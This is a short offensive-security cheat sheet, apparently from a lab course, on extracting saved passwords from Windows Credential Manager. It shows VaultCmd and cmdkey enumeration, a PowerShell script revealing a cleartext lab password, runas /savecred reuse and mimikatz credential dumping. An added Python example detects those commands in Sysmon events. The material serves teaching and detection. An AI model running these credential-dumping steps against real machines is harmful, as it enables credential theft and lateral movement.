Windows Credential Manager
Theory
Practice
# List vaults
C:\Users\Administrator> VaultCmd /list
# Extract and decrypt all master keys
sekurlsa::dpapi
# List properties of a vault
C:\Users\Administrator> VaultCmd /listproperties:"Web Credentials"
# List creds in a vault
C:\Users\Administrator> VaultCmd /listcreds:"Web Credentials"
# List creds with cmdkey
C:\Users\Administrator> cmdkey /list
# Get cleartext password
PS> Import-Module C:\Tools\Get-WebCredentials.ps1
PS> Get-WebCredentials
UserName Resource Password Properties
-------- -------- -------- ----------
THMUser internal-app.thm.red Password! {[hidden, False], [applicationid, 00000000-0000-0000-0000-000000000000], [application, MSEdge]}
# Runas with saved credential for "THM.red\thm-local"
C:\Users\Administrator> runas /savecred /user:THM.red\thm-local cmd.exe
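For defenders: the built-in commands above (VaultCmd, cmdkey, runas /savecred) each start a process, so they appear in process-creation telemetry. The following added example, which is not part of the original page, classifies such events and flags a user who enumerates stored credentials and then runs runas /savecred. The event field names follow Sysmon Event ID 1; the users, rule names and sample events are constructed.

```python
import ntpath
from collections import defaultdict

# Executable -> {switch: rule name}. The switches are the ones used on this
# page; the rule names are hypothetical labels chosen for this example.
WATCHED = {
    "vaultcmd.exe": {"/list": "vault_enum", "/listproperties": "vault_enum",
                     "/listcreds": "vault_cred_listing"},
    "cmdkey.exe": {"/list": "cmdkey_enum"},
    "runas.exe": {"/savecred": "runas_savecred"},
}

# Constructed process-creation events, in time order.
SAMPLE_EVENTS = [dict(User=u, Image="C:\\Windows\\System32\\" + exe, CommandLine=cmd)
                 for u, exe, cmd in [
    ("Administrator", "VaultCmd.exe", 'VaultCmd /listcreds:"Web Credentials"'),
    ("Administrator", "cmdkey.exe", "cmdkey /list"),
    ("Administrator", "runas.exe", r"runas /savecred /user:THM.red\thm-local cmd.exe"),
    ("helpdesk", "runas.exe", r"runas /user:THM.red\thm-local cmd.exe"),
    ("svc-backup", "runas.exe", r"runas /savecred /user:THM.red\thm-local cmd.exe"),
]]

def classify(event):
    """Return the rule name matched by one process-creation event, or None."""
    switches = WATCHED.get(ntpath.basename(event["Image"]).lower(), {})
    for token in event["CommandLine"].lower().split():
        name = token.split(":", 1)[0]  # '/listcreds:"web' -> '/listcreds'
        if name in switches:
            return switches[name]
    return None

def triage(events):
    """Return (alerts, users who enumerated credentials and then used /savecred)."""
    alerts, enumerated, escalate = [], defaultdict(set), set()
    for ev in events:  # assumed to be sorted by time
        rule = classify(ev)
        if rule is None:
            continue
        alerts.append((ev["User"], rule))
        if rule != "runas_savecred":
            enumerated[ev["User"]].add(rule)
        elif enumerated[ev["User"]]:
            escalate.add(ev["User"])
    return alerts, escalate
```

Commands typed inside the mimikatz console do not create processes, so they are outside what this command-line check can see.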
# We can also use mimikatz to dump creds
mimikatz# privilege::debug
Privilege '20' OK
mimikatz# sekurlsa::credman
Resources